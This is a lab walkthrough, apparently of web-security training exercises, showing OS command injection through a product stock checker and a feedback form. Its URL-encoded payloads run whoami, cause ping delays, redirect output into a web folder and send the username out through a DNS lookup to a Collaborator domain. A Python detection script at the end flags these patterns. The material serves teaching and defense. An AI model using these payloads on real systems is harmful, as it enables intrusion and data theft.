1. Simple Command Injection
1.1 Achieve the Objective
Execute whoami through the injection and read the current user's name from the response.
1.2 Attack Steps
Looking at the lab, the front page lists products, and clicking 'View details' opens a detail page for each product.

On a product detail page there is a function that checks the product's stock in a chosen store.
Capturing the request shows that two parameters are sent: productId and storeId.
Insert the payload into productId:
# payload
%26whoami%26
%26 is the URL encoding of &. In an application/x-www-form-urlencoded body the & character separates parameters, so a literal & in the payload would be consumed by the server's form parser as a separator and the injected command would never reach the back end as part of productId. Encoding it as %26 carries it through the parser; the server decodes the value before passing it to the shell, so the & becomes effective only there.
In the shell, & terminates a command and runs it in the background, so the following command is executed as well, regardless of whether the first one succeeded. With the payload above the back end therefore runs its stock-check command, then whoami, and the output of whoami is included in the response.
2. Blind command injection using time delays
2.1 Achieve the Objective
Cause a 10-second delay in the response using blind command injection.
2.2 Attack Steps
Go to the Submit feedback page, where users send feedback to the site. Because the feedback has to reach an administrator, the back end plausibly invokes a command-line mail tool (sendmail or similar) with the user's name, email address and message as arguments. Since the result is an email to the administrator rather than content on the page, the command's output is not reflected in the response: any injection here is blind, and a time delay is the simplest way to confirm it.
Capture the feedback submission and insert the payload into the email parameter:
# payload
%26ping%20-c%2010%20127.0.0.1%26
%20 is the URL encoding of a space. ping -c 10 127.0.0.1 sends ten pings to localhost at one-second intervals, so if the command is executed the response arrives roughly 10 seconds later than normal. Compare the timing against a submission without the payload before drawing a conclusion.
3. Blind command injection with output redirection
3.1 Achieve the Objective
The lab has a folder the web server can write to: /var/www/images
Execute whoami, redirect its output into a file in that folder, then retrieve the file's contents.
3.2 Attack Steps
It is still the feedback page. Capture the feedback submission and put the payload into the email parameter, redirecting the command output into the writable folder (the file name is a free choice; output.txt is used here):
# payload
%26whoami%3E/var/www/images/output.txt%26
%3E is the URL encoding of >, the shell's output-redirection operator, so whoami runs and its output lands in /var/www/images/output.txt instead of the response.
Then observe the requests on the lab's main page: product images are loaded through a path that takes a filename parameter. Requesting that path with filename=output.txt returns the file just written and with it the command output.
4. Blind command injection using an out-of-band channel
4.1 Achieve the Objective
Trigger a DNS lookup of a Burp Collaborator domain using blind command injection.
4.2 Attack Steps
It is still the same feedback page.
Submit any test data, click Submit feedback and capture the request.
Open the Collaborator tab in Burp Suite and generate a Collaborator payload (a unique subdomain).
Collaborator is a server under Burp's control that records DNS and HTTP interactions made to its subdomains. It is used in penetration testing to detect vulnerabilities that produce no visible change in the response: if the target resolves the unique subdomain, the lookup shows up in Collaborator even though the response itself reveals nothing. The idea is the same as the dnslog services used for the same purpose.
As before, insert the payload into the email parameter, using the subdomain generated by Collaborator:
# payload
%26nslookup%200no5vo9uebzjpzworih5vhzzyq4hs7gw.oastify.com%26
5. Exfiltrate the system username through an out-of-band channel
5.1 Achieve the Objective
Obtain the system username using out-of-band channel technology.
5.2 Attack Steps
It is, once again, the same feedback page.
Submit some test data, click Submit feedback and capture the request.
As before, insert the payload into the email parameter, again using a subdomain generated by Collaborator:
# payload
%26nslookup%20`whoami`.wrr1zkdqi73ftv0kvel1zd3v2m8dw4kt.oastify.com%26
In this payload the backticks (` `, the key to the left of 1 on most keyboards) are shell command substitution: the shell runs the enclosed command first and replaces the backticked text with its output. `whoami` therefore becomes the user name, which is prepended to the Collaborator domain as a subdomain label, and the resulting lookup (for example wwwuser.wrr1zkdqi73ftv0kvel1zd3v2m8dw4kt.oastify.com) is recorded by Collaborator. Poll Collaborator, read the user name from the queried hostname, and submit it in the lab's solution form to complete the lab. $(whoami) is equivalent to the backtick form in POSIX shells and is worth trying if backticks are filtered.
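The blind techniques in sections 2 to 5 leave the same traces in request logs, so a detection rule can be built from them. The following is an added example, not part of the original write-up: it decodes constructed feedback-form bodies (the csrf and subject fields are placeholders, the redirect file name is assumed, the Collaborator hostnames are the ones used in this page's payloads) and labels every parameter that carries a shell separator, a delay primitive, an output redirection, an out-of-band DNS lookup or command substitution.

```python
import re
from urllib.parse import parse_qs

# Constructed feedback-form bodies reproducing the payloads used above.
CAPTURED_BODIES = [
    "csrf=abc&name=test&email=test%40example.com&subject=hi&message=hello",
    "csrf=abc&name=test&email=%26ping%20-c%2010%20127.0.0.1%26&subject=hi&message=hello",
    "csrf=abc&name=test&email=%26whoami%3E/var/www/images/output.txt%26&subject=hi&message=hello",
    "csrf=abc&name=test&email=%26nslookup%200no5vo9uebzjpzworih5vhzzyq4hs7gw.oastify.com%26"
    "&subject=hi&message=hello",
    "csrf=abc&name=test&email=%26nslookup%20%60whoami%60.wrr1zkdqi73ftv0kvel1zd3v2m8dw4kt.oastify.com%26"
    "&subject=hi&message=hello",
]

# One rule per technique used in the lab. Rules run against the *decoded*
# value, because that is the form the shell eventually receives.
RULES = [
    ("shell separator", re.compile(r"[&;|]")),
    ("time delay", re.compile(r"\b(sleep\s+\d+|ping\s+-[cn]\s*\d+)")),
    ("output redirect", re.compile(r">\s*/\S+")),
    ("oob dns", re.compile(
        r"\b(nslookup|dig|host|curl|wget)\b.*\.(oastify\.com|burpcollaborator\.net)")),
    ("command substitution", re.compile(r"`[^`]+`|\$\([^)]+\)")),
]


def decode_params(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: value}.
    %26, %20, %3E and %60 become &, space, > and backtick here, which is the
    same decoding step that makes the payloads effective on the server."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def classify(body: str) -> dict:
    """Return {parameter: [technique, ...]} for every parameter matching a rule."""
    findings = {}
    for name, value in decode_params(body).items():
        hits = [label for label, rx in RULES if rx.search(value)]
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    for body in CAPTURED_BODIES:
        print(classify(body) or "clean")
```

The separator rule on its own is noisy (a legitimate message field can contain & or |), so in practice it is the combination with one of the other rules, or its presence in a field such as email that should never contain such characters, that makes an alert worth raising.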